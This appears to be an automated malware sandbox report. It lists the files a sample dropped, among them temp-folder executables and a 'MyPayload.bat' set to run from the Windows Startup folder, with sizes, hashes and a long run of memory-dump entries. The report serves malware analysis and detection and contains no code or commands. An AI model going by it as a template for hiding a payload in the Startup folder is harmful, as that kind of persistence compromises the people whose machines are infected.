3aa41d0357c561dba73f90f68912f1e1ad4fc65530307f14e6ed3b7ec502977db06aeb8b8095aae2865cba43cf78c87d36c21e218d01131206754fd72b3c5a26

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\t3k24.exe

Filesize
3.7MB

MD5
35db5d98157a46d0dffd85173f64002b

SHA1
eea811faaf27e3fdc90227fca7b462cdf19a8cc0

SHA256
d46c16cf405cfa3de9f02f0da5922d513b384a252cc9ad23fb08b513e2475910

SHA512
1e8e66192774da093bc649498f04b5230a0c0c445f87cc128825eb5f6b958dbe6b537e5fae7e2bff0b3f1900370484c6db5e1f57b7a2b5133f06151cc37d8ffb

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k77o9.exe

Filesize
2.0MB

MD5
852a4f9bc29a3959aca962d5213c4868

SHA1
4e92397a31a828a2888922ba562c747a4e835adf

SHA256
83e6fed97dce98d0c251582de36aedc7ec0c092bcec9b53e42768766135fdbb7

SHA512
3a9dd4f3a378bb4ba028abf9782c85cef5dc765530d5fe6b93cd0a296e1558cdaa7d79a8357229e856afed99f6b5981a5b1791ed4ff772d82ccf6921de781801

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z0787.exe

Filesize
1.8MB

MD5
ea34dbe53a5aeb2dbfbefe6d5aff554c

SHA1
1b1a9c30c5b452833393d92264492108bb545d5f

SHA256
0ef1f26c18ecd44c5fd3da76091ff596460e8a200b8f51d3a083bee6ef5a541a

SHA512
4ce56100591fc95089de2277e146ad6d65fc94c2856ea9a32ea940cf7181d658846fc24ed8e397ae4e56e7170baa5a2d0673eab5ed552932a643e0556ac503ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xlbrqu4p.sp4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Filesize
330KB

MD5
685fb118c357497e779efb8a586d8407

SHA1
bbb8cf75a140f43720e1db831bad3e2db09e4ff7

SHA256
a335b31be9707d1960e67b6ac6e13598d05eb4d924c45cd6a16daec275c3f1ae

SHA512
feec56c01e68aaad374f58ce2333ea83820f8576e743d1c7a6efcbad984adb6133463f52c9169eda1ca2593702fb14cc1b7e596c5e72384418419712cf1e74b8

Download Submit
memory/404-495-0x0000000007350000-0x00000000073C6000-memory.dmp

Filesize
472KB

Download
memory/404-506-0x0000000004E70000-0x0000000004E7A000-memory.dmp

Filesize
40KB

Download
memory/404-508-0x0000000007750000-0x0000000007792000-memory.dmp

Filesize
264KB

Download
memory/404-494-0x0000000006580000-0x00000000065C4000-memory.dmp

Filesize
272KB

Download
memory/740-312-0x00000000003F0000-0x00000000004D8000-memory.dmp

Filesize
928KB

Download
memory/740-319-0x00000000053F0000-0x0000000005994000-memory.dmp

Filesize
5.6MB

Download
memory/1192-74-0x0000000000C50000-0x00000000010F0000-memory.dmp

Filesize
4.6MB

Download
memory/1192-61-0x0000000000C50000-0x00000000010F0000-memory.dmp

Filesize
4.6MB

Download
memory/1192-71-0x0000000000C50000-0x00000000010F0000-memory.dmp

Filesize
4.6MB

Download
memory/1192-77-0x0000000000C50000-0x00000000010F0000-memory.dmp

Filesize
4.6MB

Download
memory/1192-44-0x0000000000C50000-0x00000000010F0000-memory.dmp

Filesize
4.6MB

Download
memory/1192-37-0x0000000000C50000-0x00000000010F0000-memory.dmp

Filesize
4.6MB

Download
memory/1192-68-0x0000000000C50000-0x00000000010F0000-memory.dmp

Filesize
4.6MB

Download
memory/1192-162-0x0000000000C50000-0x00000000010F0000-memory.dmp

Filesize
4.6MB

Download
memory/1468-423-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/2036-75-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-142-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-528-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-398-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-69-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-419-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-179-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-210-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-66-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-72-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-318-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-234-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/2036-425-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2036-510-0x0000000000260000-0x0000000000901000-memory.dmp

Filesize
6.6MB

Download
memory/2892-527-0x0000000000190000-0x000000000064B000-memory.dmp

Filesize
4.7MB

Download
memory/2892-526-0x0000000000190000-0x000000000064B000-memory.dmp

Filesize
4.7MB

Download
memory/3244-172-0x00000000007F0000-0x0000000000CAB000-memory.dmp

Filesize
4.7MB

Download
memory/3244-166-0x00000000007F0000-0x0000000000CAB000-memory.dmp

Filesize
4.7MB

Download
memory/3564-189-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp

Filesize
8.1MB

Download
memory/3564-215-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp

Filesize
8.1MB

Download
memory/3564-96-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp

Filesize
8.1MB

Download
memory/3564-264-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp

Filesize
8.1MB

Download
memory/3564-163-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp

Filesize
8.1MB

Download
memory/3660-421-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3660-214-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3660-170-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3660-512-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3660-434-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3660-412-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3660-329-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3660-187-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3660-188-0x0000000000BE0000-0x0000000001252000-memory.dmp

Filesize
6.4MB

Download
memory/3744-420-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-76-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-42-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-41-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-67-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-186-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-411-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-328-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-213-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-70-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-164-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-511-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-31-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-73-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-60-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3744-433-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/3968-451-0x0000000006400000-0x000000000644C000-memory.dmp

Filesize
304KB

Download
memory/3968-465-0x0000000007690000-0x0000000007733000-memory.dmp

Filesize
652KB

Download
memory/3968-436-0x00000000054B0000-0x0000000005AD8000-memory.dmp

Filesize
6.2MB

Download
memory/3968-437-0x0000000005C50000-0x0000000005C72000-memory.dmp

Filesize
136KB

Download
memory/3968-474-0x0000000007AF0000-0x0000000007AFA000-memory.dmp

Filesize
40KB

Download
memory/3968-441-0x0000000005DD0000-0x0000000005E36000-memory.dmp

Filesize
408KB

Download
memory/3968-438-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/3968-449-0x0000000005FC0000-0x0000000006314000-memory.dmp

Filesize
3.3MB

Download
memory/3968-450-0x00000000063E0000-0x00000000063FE000-memory.dmp

Filesize
120KB

Download
memory/3968-435-0x0000000004E40000-0x0000000004E76000-memory.dmp

Filesize
216KB

Download
memory/3968-453-0x0000000006A00000-0x0000000006A32000-memory.dmp

Filesize
200KB

Download
memory/3968-454-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/3968-464-0x00000000069B0000-0x00000000069CE000-memory.dmp

Filesize
120KB

Download
memory/3968-473-0x0000000007B00000-0x0000000007B12000-memory.dmp

Filesize
72KB

Download
memory/3968-466-0x0000000007DC0000-0x000000000843A000-memory.dmp

Filesize
6.5MB

Download
memory/3968-467-0x0000000007450000-0x000000000746A000-memory.dmp

Filesize
104KB

Download
memory/3968-468-0x0000000007770000-0x000000000777A000-memory.dmp

Filesize
40KB

Download
memory/3968-469-0x0000000007980000-0x0000000007A16000-memory.dmp

Filesize
600KB

Download
memory/3968-470-0x00000000078F0000-0x0000000007901000-memory.dmp

Filesize
68KB

Download
memory/3968-472-0x0000000007A20000-0x0000000007A42000-memory.dmp

Filesize
136KB

Download
memory/3992-323-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/3992-321-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/4292-40-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/4292-39-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/4296-98-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/4296-100-0x00000000009C0000-0x0000000000E73000-memory.dmp

Filesize
4.7MB

Download
memory/4648-32-0x00000000002C0000-0x0000000000773000-memory.dmp

Filesize
4.7MB

Download
memory/4648-14-0x00000000002C0000-0x0000000000773000-memory.dmp

Filesize
4.7MB

Download
memory/4648-15-0x0000000077854000-0x0000000077856000-memory.dmp

Filesize
8KB

Download
memory/4648-16-0x00000000002C1000-0x0000000000329000-memory.dmp

Filesize
416KB

Download
memory/4648-17-0x00000000002C0000-0x0000000000773000-memory.dmp

Filesize
4.7MB

Download
memory/4648-18-0x00000000002C0000-0x0000000000773000-memory.dmp

Filesize
4.7MB

Download
memory/4648-33-0x00000000002C1000-0x0000000000329000-memory.dmp

Filesize
416KB

Download